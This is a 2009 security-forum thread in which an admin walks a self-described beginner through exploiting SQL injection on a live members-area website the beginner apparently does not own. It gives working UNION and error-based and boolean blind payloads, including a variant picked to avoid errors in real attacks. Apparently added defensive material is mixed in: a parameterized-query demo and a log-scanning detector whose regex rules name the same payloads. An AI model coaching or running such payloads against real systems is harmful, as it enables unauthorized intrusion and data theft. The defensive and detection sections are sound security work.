Waraxe IT Security Portal  
www.waraxe.us Forum Index -> Sql injection -> sql injection help please
sql injection help please
PostPosted: Thu Jun 04, 2009 3:25 pm
RubberDoll
Active user
Joined: Jun 04, 2009
Posts: 46

Hello waraxe,
and thank you and others as knowledgeable, for offering your help in so many cases. I've been reading topics here as a guest for a long time :)
Sorry for picking a stupid topic name; I'm a noob and I didn't know how to be more specific.

I'm pretty new to injections and I'm stuck with this error, which I don't know how to move on from.
I'm assuming the site is vulnerable because it does reply with an SQL error, but I have no idea how to go on from here..

id=20477+order+by+1--
no error, and the page displayed fine

id=20477+order+by+2--
Quote:

MySQL error occured on line 380.
Error 1054: Unknown column '2' in 'order clause'


I did discover, though, that when I tried
?id=20477+order+by+13--
the sql error changed
Quote:

MySQL error occured on line 94 in file c:\ZendProject/ZendProject_c/view-94.php.src.
Error 1054: Unknown column '13' in 'order clause'
Query: SELECT aw_d1_gal_cat.parent_line, aw_d1_gal_cat.date, aw_d1_gal_cat.name, aw_d1_gal_cat.descr, aw_d1_gal_cat.descr2, aw_d1_gal_cat.descr3, aw_d1_gal_cat.descr4, aw_d1_gal_cat.descr5, aw_d1_gal_cat.id, aw_d1_gal_cat.extid, aw_d1_gal_cat.parent, aw_d1_gal_cat.trial FROM aw_gal_content, aw_d1_gal_cat WHERE aw_gal_content.id=20477 order by 13-- and aw_d1_gal_cat.extid=aw_gal_content.cid


I also tried
id=null%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12--
Quote:
Error 1222: The used SELECT statements have a different number of columns


while ?id=null%20union%20all%20select%01,2,3,4,5,6,7,8,9,10,11,12,13--
results in the long syntax error as above

I assume 12 columns would be the correct guess, despite the error msg, but I don't know how to find the vulnerable column in this case, or whether it is even possible to go further with this.

Thank you
PostPosted: Thu Jun 04, 2009 7:55 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

The affected parameter (id) is used in multiple different SQL queries, and they need different column counts. Try this:

Code:

id=-1+UNION+ALL+SELECT+12345--+


... and search for "12345" in response page html source.
If you can't get visual feedback, then next option is error-based feedback.
Try this:

Code:

?id=-1+OR+IF(0,(SELECT+1+UNION+ALL+SELECT+1),0)--+


Code:

?id=-1+OR+IF(1,(SELECT+1+UNION+ALL+SELECT+1),0)--+
PostPosted: Fri Jun 05, 2009 3:53 am
RubberDoll
Active user
Joined: Jun 04, 2009
Posts: 46

Thank you, waraxe

id=-1+OR+IF(0,(SELECT+1+UNION+ALL+SELECT+1),0)--+
blank page with:
Quote:
item not found.



?id=-1+OR+IF(1,(SELECT+1+UNION+ALL+SELECT+1),0)--+
Quote:

MySQL error occured on line 94 in file c:\ZendProject/ZendProject_c/view-94.php.src.
Error 1242: Subquery returns more than 1 row
Query: SELECT aw_d1_gal_cat.parent_line, aw_d1_gal_cat.date, aw_d1_gal_cat.name, aw_d1_gal_cat.descr, aw_d1_gal_cat.descr2, aw_d1_gal_cat.descr3, aw_d1_gal_cat.descr4, aw_d1_gal_cat.descr5, aw_d1_gal_cat.id, aw_d1_gal_cat.extid, aw_d1_gal_cat.parent, aw_d1_gal_cat.trial FROM aw_gal_content, aw_d1_gal_cat WHERE aw_gal_content.id=-1 OR IF(1,(SELECT 1 UNION ALL SELECT 1),0)-- and aw_d1_gal_cat.extid=aw_gal_content.cid


By the way, the site is an internet site and not on my machine, despite the local path shown in the error, and it is inside the members area..
PostPosted: Fri Jun 05, 2009 8:41 am
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

This means that you can use blind SQL injection methods. Still, are you sure that you don't have usable visual feedback?

Try:

Code:

id=12000%2b345


Now look at the response page: do you see the text "12345" somewhere?
Another test:

Code:

id=-1+UNION+ALL+SELECT+0x4142434445--+


And look for text "ABCDE".
By the way, for best results look at the HTML source and search for those text markers there too!

Now, if you tried this and did not get easy-to-use visual feedback, then you have to use blind injection methods. It means asking the target server boolean questions and getting data back bit by bit. Manual blind injection exploitation is time-consuming and error-prone, so I would recommend automated tools or scripts for this.
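The probes traded in this thread so far (`12000%2b345`, `order by 13--`, `UNION ALL SELECT` with a marker) all work for one reason: the `id` parameter is pasted into the SQL text, so the database evaluates whatever expression arrives, and the verbose error page then reports the result. The Python below is an added example for readers of this thread, not code from the thread or from the affected site. It reproduces the quoted query shape against an in-memory SQLite table (table name borrowed from the quoted error, rows constructed; SQLite is used so it runs offline, and since it lacks MySQL's `0x...` string literal the UNION marker is a plain `'ABCDE'`) and contrasts the interpolated query with a validated, bound-parameter version. The `isdigit()` policy is a hypothetical one for this example.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the gallery table named in the thread's error messages."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE aw_gal_content (id INTEGER PRIMARY KEY, cid INTEGER, name TEXT)")
    conn.executemany(
        "INSERT INTO aw_gal_content VALUES (?, ?, ?)",
        [(20477, 1, "public item"), (12345, 2, "members-only item")],
    )
    return conn


def find_item_vulnerable(conn, raw_id):
    """Builds the statement by string concatenation, as the quoted query evidently does.
    Whatever arrives in raw_id (arithmetic, ORDER BY, UNION) is parsed as SQL."""
    sql = "SELECT name FROM aw_gal_content WHERE id=" + raw_id
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def find_item_safe(conn, raw_id):
    """Validates the parameter against its expected type and binds it.
    The SQL text is a constant, so the value can never be parsed as SQL."""
    if not raw_id.isdigit():  # hypothetical policy for this example: ids are unsigned decimal integers
        raise ValueError("id must be a decimal integer")
    row = conn.execute("SELECT name FROM aw_gal_content WHERE id=?", (int(raw_id),)).fetchone()
    return row[0] if row else None


def run_probe(conn, finder, raw_id):
    """Runs one request value through a finder and reports what the client would observe:
    ('row', value), ('rejected', None) from input validation, or ('sql_error', message),
    the error-text channel the thread relies on."""
    try:
        return ("row", finder(conn, raw_id))
    except ValueError:
        return ("rejected", None)
    except sqlite3.Error as exc:
        return ("sql_error", str(exc))


# Decoded forms of the request values discussed in the thread (constructed list).
PROBES = [
    "20477",                          # ordinary request
    "12000+345",                      # decoded form of id=12000%2b345
    "20477 order by 13--",            # column-count probe
    "-1 UNION ALL SELECT 'ABCDE'--",  # SQLite spelling of UNION ALL SELECT 0x4142434445
]

if __name__ == "__main__":
    conn = make_db()
    for raw in PROBES:
        print(f"{raw!r:34} interpolated -> {run_probe(conn, find_item_vulnerable, raw)}")
        print(f"{'':34} bound        -> {run_probe(conn, find_item_safe, raw)}")
```

The interpolated version returns the members-only row for `12000+345`, raises an "ORDER BY term out of range" error for the column probe, and hands back the `ABCDE` marker for the UNION; the bound version rejects all three before any SQL is prepared. The second thing the thread's error dumps show is that the site echoes the failing query and file path to the client, so a complementary fix is to log database errors server-side and return a generic message, which removes the error channel even where a query was missed.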
PostPosted: Sat Jun 06, 2009 9:50 am
RubberDoll
Active user
Joined: Jun 04, 2009
Posts: 46

Yep, I'm completely sure I have no better visual feedback in the source.
Also there's no malformed page with these errors; only the error string is displayed by itself.

id=12000%2b345

Code:
item not found.

that's the source..

id=-1+UNION+ALL+SELECT+0x4142434445--+
source of reply:
Code:

<b>MySQL</b> error occured on line <u>94</u> in file <u>c:\ZendProject/ZendProject_c/view-94.php.src</u>.<br><b>Error 1222:</b> <u>The used SELECT statements have a different number of columns</u><br><b>Query:</b> <u>SELECT aw_d1_gal_cat.parent_line, aw_d1_gal_cat.date, aw_d1_gal_cat.name, aw_d1_gal_cat.descr, aw_d1_gal_cat.descr2, aw_d1_gal_cat.descr3, aw_d1_gal_cat.descr4, aw_d1_gal_cat.descr5, aw_d1_gal_cat.id, aw_d1_gal_cat.extid, aw_d1_gal_cat.parent, aw_d1_gal_cat.trial FROM aw_gal_content, aw_d1_gal_cat WHERE aw_gal_content.id=-1 UNION ALL SELECT 0x4142434445--  and aw_d1_gal_cat.extid=aw_gal_content.cid</u>


Could I ask if there's any automated tool to perform the bit-by-bit injection?
And what exactly would I need to do to make it manually? I might give it a try little by little if nothing else is possible.

I also wanted to ask, with your permission, what exactly I was 'telling' the server in these strings from your earlier reply:

?id=-1+OR+IF(0,(SELECT+1+UNION+ALL+SELECT+1),0)--+
?id=-1+OR+IF(1,(SELECT+1+UNION+ALL+SELECT+1),0)--+



Lastly, I can PM you the login info and site URL if you think that looking directly might help..

Thanks again :)
PostPosted: Sat Jun 06, 2009 12:44 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Search Google for Blind Sql Injection tools:

http://www.google.ee/search?hl=et&q=blind+sql+injection+tool&btnG=Google+otsing&lr=&aq=f&oq=

Do you know c/c++/php/perl/python/ruby or other programming languages? If you do, then it's not hard to write your own exploit script/program.

Code:

?id=-1+OR+IF(0,(SELECT+1+UNION+ALL+SELECT+1),0)--+
?id=-1+OR+IF(1,(SELECT+1+UNION+ALL+SELECT+1),0)--+


The SQL injection exploitation method above is based on inducing SQL errors.
Depending on boolean true or false, the IF() construction will return either two rows of ones or just zero, and in the case of two rows you can see a nice SQL error message about the subquery returning more than one row. In this way, depending on the server response, an attacker can distinguish between boolean true and false.
Example, which involves @@version:

Code:

?id=-1+OR+IF(LENGTH(@@version)<1,(SELECT+1+UNION+ALL+SELECT+1),0)--+
?id=-1+OR+IF(LENGTH(@@version)>0,(SELECT+1+UNION+ALL+SELECT+1),0)--+


Same example with different error inducing method:

Code:

?id=0%2bIF(LENGTH(@@version)<1,20477,0)
?id=0%2bIF(LENGTH(@@version)>0,20477,0)


The method above does not generate SQL errors, which is generally good in the case of real-world attack scenarios.
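From the server's side, every request shape explained in this thread is visible in the web server's access log before any data leaves: the `ORDER BY n` sweep, `UNION ALL SELECT` with a hex marker, the `IF(..., (SELECT 1 UNION ALL SELECT 1), 0)` subquery-error oracle, and the `0+IF(...)` arithmetic variant that, as waraxe notes, produces no SQL error at all and so never reaches a database error log. The script below is an added example, not from the thread: the log lines are constructed in combined-log format to carry those request shapes, and the rule names are my own. It URL-decodes each request's query string the way the application would (`+` to space, `%2b` to `+`), tags the patterns described above, and counts flagged requests per client, since a bit-by-bit blind extraction shows up as a long run of such requests from one source.

```python
import re
import urllib.parse
from collections import Counter

# Constructed access-log lines (combined format without referer/agent) carrying the
# request shapes discussed in the thread, plus one ordinary request.
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Jun/2009:15:20:11 +0000] "GET /view.php?id=20477 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [04/Jun/2009:15:21:03 +0000] "GET /view.php?id=20477+order+by+13-- HTTP/1.1" 200 412',
    '203.0.113.5 - - [04/Jun/2009:15:22:40 +0000] "GET /view.php?id=12000%2b345 HTTP/1.1" 200 27',
    '203.0.113.5 - - [04/Jun/2009:15:23:09 +0000] "GET /view.php?id=-1+UNION+ALL+SELECT+0x4142434445--+ HTTP/1.1" 200 430',
    '203.0.113.5 - - [04/Jun/2009:15:24:51 +0000] "GET /view.php?id=-1+OR+IF(1,(SELECT+1+UNION+ALL+SELECT+1),0)--+ HTTP/1.1" 200 398',
    '203.0.113.5 - - [04/Jun/2009:15:25:17 +0000] "GET /view.php?id=-1+OR+IF(LENGTH(@@version)>0,(SELECT+1+UNION+ALL+SELECT+1),0)--+ HTTP/1.1" 200 398',
    '203.0.113.5 - - [04/Jun/2009:15:26:02 +0000] "GET /view.php?id=0%2bIF(LENGTH(@@version)>0,20477,0) HTTP/1.1" 200 5120',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d+) \S+$'
)

# Each rule names one request shape from the thread; values are matched after URL decoding.
RULES = [
    ("column_count_probe",    re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select",          re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("subquery_error_oracle", re.compile(r"\bif\s*\(.*\(\s*select\s+1\s+union\s+all\s+select\s+1\s*\)", re.I)),
    ("arithmetic_expression", re.compile(r"^\s*-?\d+\s*[+\-*/]\s*\S")),
    ("server_variable",       re.compile(r"@@\w+")),
    ("hex_literal",           re.compile(r"\b0x[0-9a-f]{2,}\b", re.I)),
    ("sql_comment",           re.compile(r"--(\s|$)|/\*")),
]


def classify_value(value):
    """Returns the names of every rule that matches one decoded parameter value."""
    return [name for name, rx in RULES if rx.search(value)]


def scan_log(lines):
    """Parses each log line, decodes its query string (+ and %xx, as the web server
    and PHP would), and reports every parameter value matching at least one rule."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        query = urllib.parse.urlsplit(m.group("path")).query
        params = urllib.parse.parse_qs(query, keep_blank_values=True)
        for param, values in params.items():
            for value in values:
                hits = classify_value(value)
                if hits:
                    findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                                     "param": param, "value": value, "rules": hits})
    return findings


def probes_per_ip(findings):
    """Counts flagged requests per client; a blind extraction produces hundreds of these."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f'{f["ip"]} {f["param"]}={f["value"]!r}: {", ".join(f["rules"])}')
    print(dict(probes_per_ip(found)))
```

On the sample, the ordinary `id=20477` request produces no finding, the six probes each match at least one rule, and the per-client count is 6. Two points carry over to real logs: the arithmetic variant is caught only because the decoded value is inspected, so decoding before matching matters, and the HTTP status is 200 on every line, so a detection that keys on error status codes would see nothing here.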
PostPosted: Sun Jun 07, 2009 6:03 am
RubberDoll
Active user
Joined: Jun 04, 2009
Posts: 46

Thank you waraxe, I did find a Windows tool (Absinthe) that also supports login (since the vulnerable script is in the members area), but it does not support MySQL.

Unfortunately, I have no knowledge of programming. Nothing at all.

Perhaps I'm aiming too high trying this site, and I should move on and find a more "common" target.
Thanks for your time :)
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"